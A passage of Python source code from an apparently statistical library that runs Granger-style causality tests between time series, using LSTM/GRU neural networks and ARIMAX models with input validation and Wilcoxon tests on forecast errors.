E.g. if NN_config = ['l','dr','d'] and NN_neurons = [100, 0.1, 30], than first layer is LSTM layer with 100 neurons, than is Dropout layer with rate 0.1 and after it is Dense layer with 30 neurons.
Always last layer is Dense layer with one neuron and linear activation function.
run - int, determines how many times a given neural network architecture will be trained to select the model that has found the best minimum of the cost function
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
epochs_num - int or list, number of epochs used for fitting the model. If list, then the length should be equal to number of different learning rates used
learning_rate - float or list, the applied learning rate for the training process. If list, then the length should be equal to the lenth of epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary, where the number of used lags is keys. Each key stores a list, which contains test results, models for prediction of X fitted only on X time series,
models for prediction of X fitted on X and Y time series, history of fitting the first model, history of fitting the second model, RSS of models based only on X, RSS of models based on X and Y,
index of the best model based on X, index of the best model based on X and Y, errors from the best model based on X, errors from the best model based on X and Y
------
Example 1.
NN_config = ['l','dr','d'], NN_neurons = [100, 0.1, 30]
Used model:
LSTM layer(100 neurons) -> Dropout layer (rate = 0.1) -> Dense layer(30 neurons) -> Dense layer(1 neuron)
Example 2.
NN_config = ['g','d','dr','l'], NN_neurons = [50, 40, 0.2, 20]
Used model:
GRU layer(50 neurons) -> Dense layer(40 neurons) -> Dropout layer(rate =0.2) -> LSTM layer(20 neurons) -> Dense layer(1 neuron)
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking if NN_config has correct type and values
if type(NN_config) is not np.ndarray and type(NN_config) is not list and type(NN_config) is not tuple:
raise TypeError('NN_config should be list, tuple or numpy array.')
elif len(NN_config)==0:
raise ValueError('NN_config can not be empty.')
else:
for n in NN_config:
if n == 'd' or n == 'l' or n =='g' or n == 'dr':
continue
else:
raise ValueError("Elements in NN_config should be equal to 'd' for Dense, 'l' for LSTM, 'g' for GRU or 'dr' for Dropout.")
# Checking if NN_neurons has correct type and values
if type(NN_neurons) is not np.ndarray and type(NN_neurons) is not list and type(NN_neurons) is not tuple:
raise TypeError('NN_neurons should be list, tuple or numpy array.')
elif len(NN_neurons)==0:
raise Exception('NN_neurons can not be empty.')
elif len(NN_neurons) != len(NN_config):
raise Exception('NN_neurons should have the same number of elements as NN_config.')
else:
for i, n in enumerate(NN_neurons):
if type(n) is not int and NN_config[i] !='dr' or NN_config[i] =='dr' and type(n) is not float:
raise TypeError('Every element in NN_neurons should be a positive integer or a float between 0 and 1 for Dropout layer.')
elif NN_config[i] =='dr' and n>=1.0:
raise ValueError('Value for Dropout layer should be float between 0 and 1.')
elif n<=0:
raise ValueError('Every element in NN_neurons should be a positive integer or a float between 0 and 1 for Dropout layer.')
# Checking if run has correct type and value
if type(run) is not int:
raise TypeError('run should be an integer.')
elif run<=0:
raise ValueError('run should be a positive integer.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] !=2:
raise Exception('xtest has wrong shape.')
elif xtest.shape[1] !=2:
raise Exception('xtest has to many columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if np.array(ztest.shape).shape[0] != 2:
raise Exception('ztest has wrong shape.')
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif z!=[] and ztest==[] and isxtest==False:
ztest=z
elif z!=[] and ztest==[] and isxtest==True:
raise Exception('ztest should have the same length as xtest.')
elif ztest != []:
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if epochs_num has correct type and value
if type(epochs_num) is not int and type(epochs_num) is not list:
raise TypeError('epochs_num should be a positive integer or list of positibe integers.')
elif type(epochs_num) is int:
if epochs_num<=0:
raise ValueError('epochs_num should be a positive integer or list of positibe integers.')
else:
epochs_num=[epochs_num]
if type(learning_rate) is list:
raise TypeError('If epochs_num is a int, then learning_rate also should be int or float not list.')
elif type(epochs_num) is list:
for e in epochs_num:
if type(e) is not int:
raise TypeError('epochs_num should be a positive integer or list of positibe integers (or both).')
elif e<=0:
raise ValueError('epochs_num should be a positive integer or list of positibe integers (or both).')
if type(learning_rate) is not list:
raise TypeError('If epochs_num is a list, then learning_rate also should be a list.')
# Checking if learning_rate has correct type and value
if type(learning_rate) is not int and type(learning_rate) is not float and type(learning_rate) is not list:
raise TypeError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
elif type(learning_rate) is int or type(learning_rate) is float:
if learning_rate<=0:
raise ValueError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
else:
learning_rate=[learning_rate]
elif type(learning_rate) is list:
for lr in learning_rate:
if type(lr) is not int and type(lr) is not float:
raise TypeError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
elif lr<=0:
raise ValueError('learning_rate should be a positive integer or float or list of positibe integers or floats (or both).')
if type(epochs_num) is not list:
raise TypeError('If learning_rate is a list, then epochs_num also should be a list.')
# Checking if batch_size_num has correct type and value
if type(batch_size_num) is not int and not np.isnan(batch_size_num) :
raise TypeError('batch_size_num should be a positive integer or NaN.')
elif type(batch_size_num) is int:
if batch_size_num<=0:
raise ValueError('batch_size_num should be a positive integer.')
# Checking if verbose has correct type
if type(verbose) is not bool:
raise TypeError('verbose should be boolean.')
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
length = x.shape[0]
testlength = xtest.shape[0]
results = dict()
# Creating neural network models and testing for casuality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal, that will be forecasting
Xtest = xtest[lag:,0]
# input data for model based only on X (and z if set)
if z!=[]:
xz= np.concatenate((z,x[:,0].reshape(x.shape[0],1)),axis=1)
dataX = np.zeros([x.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:,:]=xz[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataX = np.zeros([x.shape[0]-lag,lag]) # input matrix for training the model only with data from X time series
for i in range(length-lag):
dataX[i,:]=x[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataX = dataX.reshape(dataX.shape[0],dataX.shape[1],1) # reshaping the data to meet the requirements of the model
# input data for model based on X and Y (and z if set)
if z!=[]:
xz= np.concatenate((z,x),axis=1)
else:
xz=x
dataXY = np.zeros([xz.shape[0]-lag,lag,xz.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(length-lag):
dataXY[i,:,:] = xz[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest[:,0].reshape(xtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model only with data from X time series
for i in range(testlength-lag):
dataXtest[i,:,:]=xztest[i:i+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for i in range(xtest.shape[0]-lag):
dataXtest[i,:]=xtest[i:i+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test data for model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xtest),axis=1)
else:
xztest=xtest
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for training the model with data from X and Y time series
for i in range(testlength-lag):
dataXYtest[i,:,:] = xztest[i:i+lag,:] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
modelX = {}
modelXY = {}
RSSX = []
RSSXY = []
historyX = {}
historyXY = {}
for r in range(run):
modelX[r] = Sequential() # Creating Sequential model, which will use only data from X time series to forecast X.
modelXY[r] = Sequential() # Creating Sequential model, which will use data from X and Y time series to forecast X.
historyX[r] = []
historyXY[r] = []
in_shape = dataX.shape[1]
for i, n in enumerate(NN_config):
if n == 'd': # adding Dense layer
if i+1 == len(NN_config): # if it is the last layer
modelX[r].add(Dense(NN_neurons[i], activation = 'relu'))
modelXY[r].add(Dense(NN_neurons[i], activation = 'relu'))
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:] and i == 0: # if one of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu'), input_shape = [dataX.shape[1],dataX.shape[2]]))
modelXY[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu'), input_shape = [dataXY.shape[1],dataXY.shape[2]]))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:]: # if one of the next layers is LSTM or GRU, but it is not the first layer
modelX[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu')))
modelXY[r].add(TimeDistributed(Dense(NN_neurons[i],activation = 'relu')))
in_shape = NN_neurons[i] # input shape for the next layer
elif i==0:
modelX[r].add(Dense(NN_neurons[i], input_shape = [dataX.shape[1], dataX.shape[2]], activation = 'relu')) # TODO changing activation function
modelXY[r].add(Dense(NN_neurons[i], input_shape = [dataXY.shape[1], dataXY.shape[2]], activation = 'relu')) # TODO changing activation function
in_shape = NN_neurons[i] # input shape for the next layer
else:
modelX[r].add(Dense(NN_neurons[i], activation = 'relu')) # TODO changing activation function
modelXY[r].add(Dense(NN_neurons[i], activation = 'relu')) # TODO changing activation function
in_shape = NN_neurons[i] # input shape for the next layer
elif n == 'l': # adding LSTM layer
if i+1 == len(NN_config)and i!=0: # if it is the last layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
elif i+1 == len(NN_config)and i==0: # if it is the only layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:] and i == 0: # if one of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:]: # if one of the next layers is LSTM or GRU, but it is not the first layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' not in NN_config[i+1:] or 'g' not in NN_config[i+1:] and i == 0: # if none of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(LSTM(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
else:
modelX[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(LSTM(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
elif n == 'g': # adding GRU layer
if i+1 == len(NN_config) and i != 0: # if it is the last layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
if i+1 == len(NN_config) and i == 0: # if it is the only layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:] and i == 0: # if one of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' in NN_config[i+1:] or 'g' in NN_config[i+1:]: # if one of the next layers is LSTM or GRU, but it is not the first layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = True))
in_shape = NN_neurons[i] # input shape for the next layer
elif 'l' not in NN_config[i+1:] or 'g' not in NN_config[i+1:] and i == 0: # if none of the next layers is LSTM or GRU and it is the first layer
modelX[r].add(GRU(NN_neurons[i],input_shape=(dataX.shape[1],dataX.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(dataXY.shape[1],dataXY.shape[2]), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
else:
modelX[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
modelXY[r].add(GRU(NN_neurons[i],input_shape=(in_shape,1), activation='tanh', recurrent_activation='tanh', use_bias=True, return_sequences = False))
in_shape = NN_neurons[i] # input shape for the next layer
elif n == 'dr':
modelX[r].add(Dropout(NN_neurons[i]))
modelXY[r].add(Dropout(NN_neurons[i]))
if not('l' in NN_config or 'g' in NN_config):
modelX[r].add(Flatten())
modelX[r].add(Dense(1,activation = 'linear')) # adding output layer
if not('l' in NN_config or 'g' in NN_config):
modelXY[r].add(Flatten())
modelXY[r].add(Dense(1,activation = 'linear')) # adding output layer
for i, e in enumerate(epochs_num):
opt = keras.optimizers.Adam(learning_rate=learning_rate[i])
modelX[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyX[r].append(modelX[r].fit(dataX, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
modelXY[r].compile(optimizer=opt,
loss='mean_squared_error',
metrics=['mse'])
historyXY[r].append(modelXY[r].fit(dataXY, X, epochs = e, batch_size = batch_size_num, verbose = verbose))
XpredX = modelX[r].predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = Xtest-XpredX
XYpredX = modelXY[r].predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = Xtest-XYpredX
RSSX.append(sum(errorX**2))
RSSXY.append(sum(errorXY**2))
idx_bestX = RSSX.index(min(RSSX))
idx_bestXY = RSSXY.index(min(RSSXY))
best_modelX = modelX[idx_bestX]
best_modelXY = modelXY[idx_bestXY]
# Testing for statistically smaller forecast error for the model, which include X and Y
# Wilcoxon Signed Rank Test test
XpredX = best_modelX.predict(dataXtest)
XpredX = XpredX.reshape(XpredX.size)
XYpredX = best_modelXY.predict(dataXYtest)
XYpredX = XYpredX.reshape(XYpredX.size)
errorX = Xtest-XpredX
errorXY = Xtest-XYpredX
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
# Printing the tests results and plotting effects of forecasting
print('lag=%d' %lag)
print("Statistics value =", S,"p-value =", p_value)
if plot:
plt.figure(figsize=(10,7))
plt.plot(Xtest)
plt.plot(XpredX)
plt.plot(XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, modelX, modelXY, historyX, historyXY,
RSSX, RSSXY, idx_bestX, idx_bestXY, errorX, errorXY],
['test results','models based on X', 'models based on X and Y',
'history of fitting models based on X', 'history of fitting models based on X and Y',
'RSS of models based only on X', 'RSS of models based on X and Y',
'index of the best model based on X', 'index of the best model based on X and Y',
'errors from model based on X','errors from model based on X and Y'])
return results
#%% ARIMAX
def nonlincausalityARIMAX(x, maxlag, d, xtest=[], z=[], ztest=[],plot = False):
'''
This function is implementation of modified Granger causality test. Granger causality is using linear autoregression for testing causality.
In this function forecasting is made using ARIMAX model.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
Returns
-------
results - dictionary, where the number of used lags is keys. Each key stores a list, which contains test results, the model for prediction of X fitted only on X time series,
the model for prediction of X fitted on X and Y time series, number of differencing used for fitting those models.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] !=2:
raise Exception('x should have 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy.ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be a positive integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy.ndarray.')
# Checking if d has correct type and value
if type(d) is not int:
raise TypeError('d should be an integer.')
elif d<0:
raise ValueError('d should be a nonnegative integer.')
# Checking the test data correctness
isxtest = False
if type(xtest) is np.ndarray:
if np.array(xtest.shape).shape[0] !=2:
raise Exception('xtest has wrong shape.')
elif xtest.shape[1] !=2:
raise Exception('xtest has to many columns.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
else:
isxtest = True
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
# Checking if z has correct type and values
if type(z) is np.ndarray:
if np.array(z.shape).shape[0] != 2:
raise Exception('z has wrong shape.')
elif z.shape[0] != x.shape[0]:
raise Exception('z should have the same length as x.')
elif True in np.isnan(z):
raise ValueError('There is some NaN in z.')
elif True in np.isinf(z):
raise ValueError('There is some infinity value in z.')
elif z != []:
raise TypeError('z should be numpy ndarray or [].')
# Checking the z test data correctness
if type(ztest) is np.ndarray:
if np.array(ztest.shape).shape[0] != 2:
raise Exception('ztest has wrong shape.')
if ztest.shape[0] != xtest.shape[0]:
raise Exception('ztest should have the same length as xtest.')
elif True in np.isnan(ztest):
raise ValueError('There is some NaN in ztest.')
elif True in np.isinf(ztest):
raise ValueError('There is some infinity value in ztest.')
elif z!=[] and ztest==[] and isxtest==False:
ztest=z
elif z!=[] and ztest==[] and isxtest==True:
raise Exception('ztest should have the same length as xtest.')
elif ztest != []:
raise TypeError('ztest should be numpy ndarray, or [].')
# Checking if plot has correct type
if type(plot) is not bool:
raise TypeError('plot should be boolean.')
# Number of samples in each time series
results = dict()
# Creating ARIMA models and testing for casuality for every lag specified by maxlag
for lag in lags:
X = x[lag:,0] # signal, that will be forecasting
length = x.shape[0]
Y = np.zeros([x.shape[0]-lag,lag]) # exogenous variable
for i in range(length-lag):
Y[i,:,] = x[i:i+lag,1] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
if z==[]:
modelX = ARIMA(X, order=(lag,d,lag))
modelXY = ARIMA(X, exog = Y, order=(lag,d,lag))
else:
z1 = np.zeros([z.shape[0]-lag,z.shape[1]*lag])
for i in range(length-lag):
z1[i,:,] = z[i:i+lag,:].reshape(1,-1) # in each row there is lag number of values of X and lag number of values of Y and z before the value in corresponding row in X
modelX = ARIMA(X, exog = z1,order=(lag,d,lag))
zY = np.zeros([z.shape[0],z.shape[1]+1])
zY[:,0] = x[:,1]
zY[:,1:] = z[:,:]
zY_1 = np.zeros([zY.shape[0]-lag,zY.shape[1]*lag])
for i in range(length-lag):
zY_1[i,:,] = zY[i:i+lag,:].reshape(1,-1) # in each row there is lag number of values of X and lag number of values of Y and z before the value in corresponding row in X
modelXY = ARIMA(X, exog = zY_1, order=(lag,d,lag))
model_fitX = modelX.fit()
model_fitXY = modelXY.fit()
if z==[]:
length_test = xtest.shape[0]
Ytest = np.zeros([xtest.shape[0]-lag,lag]) # exogenous variable
for i in range(length_test-lag):
Ytest[i,:,] = xtest[i:i+lag,1] # in each row there is lag number of values of X and lag number of values of Y before the value in corresponding row in X
model_fitX = model_fitX.apply(xtest[lag:,0])
model_fitXY = model_fitXY.apply(xtest[lag:,0], exog = Ytest)
else:
length_test = xtest.shape[0]
ztest_1 = np.zeros([ztest.shape[0]-lag,ztest.shape[1]*lag])
for i in range(length_test-lag):
ztest_1[i,:,] = ztest[i:i+lag,:].reshape(1,-1) # in each row there is lag number of values of X and lag number of values of Y and z before the value in corresponding row in X
zYt = np.zeros([ztest.shape[0],ztest.shape[1]+1])
zYt[:,0] = xtest[:,1]
zYt[:,1:] = ztest[:,:]
zYtest = np.zeros([ztest.shape[0]-lag,zYt.shape[1]*lag])
for i in range(length_test-lag):
zYtest[i,:,] = zYt[i:i+lag,:].reshape(1,-1) # in each row there is lag number of values of X and lag number of values of Y and z before the value in corresponding row in X
model_fitX = model_fitX.apply(xtest[lag:,0], exog = ztest_1)
model_fitXY = model_fitXY.apply(xtest[lag:,0], exog = zYtest)
XpredX = model_fitX.predict(typ='levels')
XYpredX = model_fitXY.predict(typ='levels')
X_test = xtest[lag:,0]
errorX = X_test-XpredX
errorXY = X_test-XYpredX
RSS1 = sum(errorX**2)
RSS2 = sum(errorXY**2)
# Testing for statistically smaller forecast error for the model, which include X and Y
# Wilcoxon Signed Rank Test test
S, p_value = stats.wilcoxon(np.abs(errorX),np.abs(errorXY),alternative='greater')
if plot:
plt.figure(figsize=(10,7))
plt.plot(np.linspace(0,len(X_test),len(X_test)),X_test)
plt.plot(np.linspace(0,len(XpredX),len(XpredX)),XpredX)
plt.plot(np.linspace(0,len(XYpredX),len(XYpredX)),XYpredX)
plt.legend(['X','Pred. based on X','Pred. based on X and Y'])
plt.xlabel('Number of sample')
plt.ylabel('Predicted value')
plt.title('Lags:'+str(lag))
plt.show()
print('lag=%d' %lag)
print("Statistics value =", S,"p-value =", p_value)
test_results = {"Wilcoxon test": ([S, p_value],['Statistics value', 'p-value'])}
results[lag] = ([test_results, model_fitX, model_fitXY, RSS1, RSS2, errorX, errorXY],
['test results','model including X', 'model including X and Y',
'RSS of model based only on X', 'RSS of model based on X and Y',
'errors from model based on X','errors from model based on X and Y'])
return results
#%% Measure LSTM
def nonlincausalitymeasureLSTM(x, maxlag, w1, w2, LSTM_layers, LSTM_neurons, run=1, Dense_layers=0, Dense_neurons=[], xtest=[], z=[], ztest=[], add_Dropout=True, Dropout_rate=0.1, epochs_num=100, learning_rate=0.01, batch_size_num=32, verbose=True, plot=False, plot_res = True, plot_with_xtest = True):
'''
This function is using modified Granger causality test to examin mutual causality in 2 or more time series.
It is using nonlincausalityLSTM function for creating prediction models.
A measure of causality is derived from these models asa sigmoid fuction
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
Where
RMSE1 is root mean square error obtained from model using only past of X to predict X.
RMSE2 is root mean square error obtained from model using past of X and Y to predict X.
RMSE is counted from w1 moments of time series with a step equal to w2.
This function is counting mutual causality for every pair of time series contained in columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - number of samples, which are taken to count RMSE in measure of causality.
w2 - number of sample steps for counting RMSE in measure of causality.
LSTM_layers - int, number of LSTM layers in the model.
LSTM_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of LSTM layers specified in LSTM_layers. The first LSTM layer has the number of neurons equal to the first element in LSTM_neurns,
the second layer has the number of neurons equal to the second element in LSTM_neurons and so on.
Dense_layers - int, number of Dense layers, besides the last one, which is the output layer.
Dense_neurons - list, tuple or numpy array, where the number of elements should be equal to the number of Dense layers specified in Dense_layers.
xtest - numpy ndarray, where each column corresponds to one time series, as in the variable x. This data will be used for testing hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is for testing conditional causality.
In this approach, the first model is forecasting the present value of X based on past values of X and z, while the second model is forecasting the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), where each column corresponds to one time series, as in the variable z. This data will be used for testing hypothesis.
add_Dropout - boolean, if True, than Dropout layer is added after each LSTM and Dense layer, besides the output layer.
Dropout_rate - float, parameter 'rate' for Dropout layer.
epochs_num - int or list, number of epochs used for fitting the model. If list, then the length should be equal to number of different learning rates used
learning_rate - float or list, the applied learning rate for the training process. If list, then the length should be equal to the lenth of epochs_num list.
batch_size_num - int, number of batch size for fitting the model.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_xtest - boolean, if True data from xtest are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityLSTM() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be grater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking the test data correctness
if type(xtest) is np.ndarray:
if xtest.shape[1] !=x.shape[1]:
raise Exception('xtest should have the same number of columns as x.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
